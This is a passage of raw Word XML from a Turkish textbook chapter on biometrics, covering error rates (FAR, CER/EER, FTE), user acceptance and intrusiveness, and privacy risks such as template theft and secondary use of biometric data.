                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB"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NFA = Number of false acceptances</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002C77AB">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Yanlış kabullerin sayısı</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002C77AB">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>NEIA = Number of imposter identification attempts</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (Sahtekâ</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002C77AB">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>r tanıma girişimi sayısı</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002C77AB">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>NEVA = Number of imposter verification attempts</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002C77AB">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Sahtekâr doğrulama girişimleri sayısı</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Herhangi bir biyometrik sistem hakkında bilinmesi gereken son istatistik Eşit Hata Oranı (EER-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equal Error Rate) olarak da bilinen Çapraz Hata Oranıdır (CER-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Crossover Error Rate). Bu, Yanlış Reddetme Oranının ve Yanlış Kabul Oranının, nüfusun büyüklüğüne eşit olduğu noktadır. Yani, sistem yanlış negatiflerin oranı ve sistem tarafından üretilen yanlış pozitiflerin oranı yaklaşık olarak eşit olacak şekilde ayarlanmıştır. İdeal olarak amaç, hem en az yanlış negatif hem de yanlış pozitif üretmek için sistemi Çapraz Hata Oranını mümkün olduğunca düşük tutacak şekilde ayarlamaktır. Ancak, bunun nasıl yapılacağına dair kesin bir kural yoktur ve sistemin hassasiyetinde yapılan değişiklikler her iki faktörü de etkiler. Sahte pozitifleri azaltmak amacıyla sistemi daha sıkı tanımlama için ayarlamak, hatalı ölçümlere neden olacaktır, çünkü sistem tarafından alınan şüpheli ölçümler kabulden ziyade reddedilme eğilimindedir. Aynı şekilde, sistemi sorgulanabilir okumaların daha fazla kabul edilmesi için ayarlarsanız (örneğin, müşteri hizmetlerini iyileştirme çabasıyla), daha fazla yanlış pozitif okuma olasılığını artırırsınız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Son olarak, her biyometrik sistem için, Kayıt Oranı Arızası var veya FTE(Failure To Enroll rate). FTE, verilen bir kullanıcının sisteme kayıt olamaması olasılığıdır. Bu, sistemdeki hatalardan ya da kullanıcının biyometrik karakteristiğinin yeterince benzersiz olmadığı veya ölçülmesinin zor olmasından kaynaklanabilir. Biyometrik veri sağlayamayan kullanıcılar (örneğin, ampute ya da konuşamayanlar), genellikle sistemin FTE oranında sayılmaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Uygulama sorunları (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implementation Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Son derece teknolojik yöntemler kullanan diğer tüm otomatik sistemler gibi, biyometrik sistemlerde kullanılan teknoloji de o sistemin genel etkinliğinde sadece bir rol oynamaktadır. Eşit derecede önemli olan bir diğer parça, bu teknolojinin sistemde nasıl uygulandığı ve kullanıcıların teknoloji ile nasıl etkileşime girdiğidir. Son teknoloji teknolojisi, eğer kötü uygulanırsa ya da sistemin kullanıcıları, kullanımına karşı dirençli (veya hatta düşmanca) ise, çok az kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A"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8D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Önemli bir faktör, bir biyometrik sistem kullanıcılarının göreceli özerkliğidir. Bu, kullanıcıların biyometrik tanımlamayı kullanan bir sisteme katılmaya direnme veya reddetme yeteneklerini ifade eder. Genel olarak, şirket çalışanları (veya sözleşmeye bağlı zorunluluklarla bağlı olanlar) sistemi istihdam veya sözleşmelerinin bir şartı olarak kullanmaya ikna edilebilir veya zorlanabilir. Direnebilmelerine veya protesto etmelerine rağmen, çok az ricaları veya alternatifleri var. Öte yandan, genel halkın üyeleri, müdahaleci olduğunu veya kişisel mahremiyetlerini çok fazla ihlal ettiğini düşündükleri bir biyometrik sisteme katılımdan vazgeçme kabiliyetine sahipler. Bu kullanıcıların her biri “riske karşı kazanç” kararı verir ve sisteme katılıp katılmamaya karar ver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8D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bazı kullanıcılar, fiziksel olarak rahatsız edici olduğunu düşündükleri bir biyometrik sistem kullanmaya direneceklerdir. Bazı biyometrik teknolojiler (örneğin, retina taramaları veya parmak izi okumaları) kullanıcılar üzerinde fiziksel olarak daha fazla etkilemektedir. Ses tanıma veya yüz tanıma gibi diğer teknolojiler sosyal olarak daha kabul edilebilir çünkü kişisel yakınlık riskini daha az etkiliyor ve kullanıcının fiziksel olarak herhangi bir şeye dokunmasını gerektirmiyor. Daha önce de belirtildiği gibi, kişisel dokunuşla ilgili veya kişisel görüntülerin yakalanması ile ilgili kültürel hususlar, müdahaleci olma konusunda da önemli bir rol oynamaktadır. Genel olarak, belirli bir biyometrik teknoloji ne kadar fiziksel olarak müdahaleci olursa, o kadar çok kullanıcı kullanımına direnecek ve aynı zamanda daha yüksek hata oranları üretebilecektir, çünkü </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>rahatsız kullanıcılar ölçüm için kendilerini uygun şekilde sunmaya hazır olma şartına sahip olmayacaktı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C20243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcının sistemin nasıl kullanıldığına dair algısı, sistemin etkinliğinde de önemli bir rol oynar. Kullanıcılar, kullanımlarının arkasındaki motivasyonu anlamak isterler. Sistem sahibi “kötü adamları” yakalamak istiyor mu? Bu durumda, kullanıcılar, mal sahibinin gözünde potansiyel şüpheli olduklarını hissedebilir ve bunlardan birini “yakalama” denemelerine kibarca bakmayacaklardır. Öte yandan, sistemi kullanan insanları korumak ve izinsiz personelin binaya girmesini ve masum insanlara zarar vermesini önlemek için sistem kullanılıyorsa (ve tanıtılıyorsa), bu kullanım kullanıcı nüfusu için daha kolay kabul edilebilir ve kullanımlarına yönelik tutumlarını değiştir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C20243">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Belirli teknolojilerin kendileri kullanıcılar ile ilgili olabilir. Parmak izi kullanımı en çok suçlu davranışlarıyla ilişkilendirilmiştir. Bir sistem sahibi tamamen iyi niyetli amaçlar için bir parmak izi tarama sistemi uygulasa bile, bu sistemin kullanıcıları suçlu gibi muamele görmüş gibi hissedebilir ve kullanımına direnebilir. Kullanım kolaylığı her zaman bir biyometrik sistemin doğru çalışmasında bir faktördür. Kayıt işlemi hızlı bir şekilde gerçekleştiriliyor mu ve minimum çaba gerektiriyor mu? Biyometrik ölçüm yapmak için özel prosedürler gerekli midir, yoksa kullanıcı başka bir aktivite yaparken ölçümler yapılabilir mi? Kullanıcılar, işlemi geçip geçmediklerini öğrenmek için ölçümleri yaptıktan sonra ne kadar süre beklemelidir? Uygun son kullanıcı operasyonel ve ergonomik planlama, düşük hata oranları ve daha yüksek kullanıcı memnuniyeti sağlama yönünde uzun bir yol kat edebil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F77FCA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu gizlilik ve kişisel bilgilerin güvenliği konusundaki farkındalığın arttığı günlerde, pek çok potansiyel sistem uygulayıcısının ve kullanıcının, biyometri kullanımının gizlilik yönleriyle ilgili endişeleri olması şaşırtıcı değildir. Diğer tanımlama yöntemlerinin çoğunda, adı, kimlik nu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>marası, boyu, kilosu, yaşı vb. g</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77FCA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ibi söz kon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usu kişi hakkında bilgi toplar. B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77FCA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iyometrik uygulamalarda, sistem söz konusu kişinin parmak izi düzenleri veya ses dü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">zenleri gibi bilgilerini tutar. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77FCA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bilgi türü, kelimenin tam anlamıyla gerçek anlamda “kişisel” ve birçok kullanıcı bu kişisel detay seviyesini paylaşmaktan rahatsızlık duyuyor. Diğer tüm teknolojilerden daha fazla, biyometri, bir kişinin sahip olduğu en temel bilgilerin bir kısmını yakalama ve kaydetme yeteneğine sahipt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F52509">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Birçoğu kişisel bilgilerinin depolanmasıyla da ilgilenmektedir. Nerede saklanacak, nasıl kullanılacak ve (en önemlisi) kime erişebilecek? Aslında, biyometrik sistem, bireyin özünü, o kişiyi benzersiz bir şekilde tanımlayabilen bir özelliği saklıyor. Yetkisiz kişiler bu bilgiyi elde ederse, bunu kendi çıkarlarına veya mağdurun zararına kullanabilirler. Depolanan biyometrik bilgilerin kaybı veya uzlaşması, en gerçek kimlik hırsızlığı biçimi için bir fırsat suna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041D53">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Örneğin, “Joe Badguy” un bir kullanıcının parmak izi tanımlama için kullanılan şablonunu alabildiğini varsayalım. Bu şablonu sisteme bu kullanıcı olarak göstermek için kullanabilir veya belki de başka bir sisteme erişmek için bu şablonu başka bir sisteme besleyebilir. Şablonu meşru bir kullanıcı için değiştirebilir ve kendi şablon verilerini değiştirebilir. Bu noktada, Joe Badguy parmak izlerini sisteme sunabilir ve “Jane Masum, yetkili kullanıcı” olarak doğru bir şekilde tanımlanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD3DC8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometri, kullanıcılarının kişisel yaşamlarında anonimlik olasılığını da azaltır. Kredi kartlarının küresel ekonomideki evrensel kullanımına rağmen, birçok kişi hala birçok işlem için nakit para kullanmayı tercih ediyor, çünkü bu kişilerin gizliliğini korumalarına izin veriyor. Nakit akışını takip etmek, kredi kartı kayıtlarını takip etmekten çok daha zordur. Müşterilerin ödeme hattını hızlandırmasına yardımcı olmak için yüz tanıma özelliğini kullanarak mağazanın önceki örneğini alarak, sistemin bir müşterinin satın aldığı ürünleri o müşterinin biyometrik verileriyle birlikte veri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3DC8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tabanında da sakladığını varsayalım. Bu sisteme davetsiz misafir (veya hatta güvenilir bir içerden gelen kişi), konunun kamuya açıklamayacağı (örneğin utanç verici bir sağlık durumunun göstergesi olabilecek bazı ilaçların satın alınması gibi) potansiyel olarak utanç verici veya tehlikeye atıcı bilgiler keşfedebilecektir. İnsanları satın alımlarla ilişkilendirmek için biyometri kullanarak, insanların özgür bir toplumun temel ilkelerinden biri olan kişilerin anonim davranmalarını azaltırsınız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00763D0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B575B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel olarak bilgi sistemleriyle ilgili büyük bir gizlilik sorunu ikincil kullanım konusudur. Bu, bir amaç için toplanan bilgilerin tamamen farklı bir amaç için kullanıldığı (veya üçüncü bir tarafa satıldığı) durumdur. İkincil kullanım, kendi başına biyometrik sistemlere özgü değildir, ancak biyometrik bir veri tabanında depolanan bilgilerin kişisel niteliği nedeniyle, kimlik sahtekarlığı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> potansiyeli daha da yüksektir. </w:t>
      </w:r>
      <w:r w:rsidRPr="006B575B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir kullanıcı, yüzünü ATM işlemlerini doğrulamak için bir sistemin bir parçası olarak k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ullanması için izin</w:t>
      </w:r>
      <w:r w:rsidRPr="006B575B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> onay verebilirken (sonuçta, p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">araya rahat erişim için takas). </w:t>
      </w:r>
      <w:r w:rsidRPr="006B575B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu kullanıcı, aynı biyometrik karakteristik bilgiyi yerel bir satıcıyla paylaşmayı kabul etmeyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00763D0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="page" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="1531"/>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5362"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E77DF4" w:rsidTr="009C4399">
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00CF6A57" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:ind w:left="-68"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF6A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>EK 1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00CF6A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  Karakteristik Türüne Göre Biyometrik Teknolojiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E77DF4" w:rsidTr="009C4399">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00CF6A57" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF6A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
              <w:t>Çizgi türü (</w:t>
            </w:r>
            <w:r w:rsidRPr="00CF6A57">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF6A57">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
              <w:t>Trait Type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00CF6A57" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF6A57">
              <w:rPr>
                <w:rFonts w:cs="Minion-Bold"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                        Biometric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E77DF4" w:rsidTr="009C4399">
        <w:trPr>
          <w:trHeight w:val="804"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phenotypic  (Fenotipik)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>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 xml:space="preserve">Fingerprints </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Parmak izleri)</w:t>
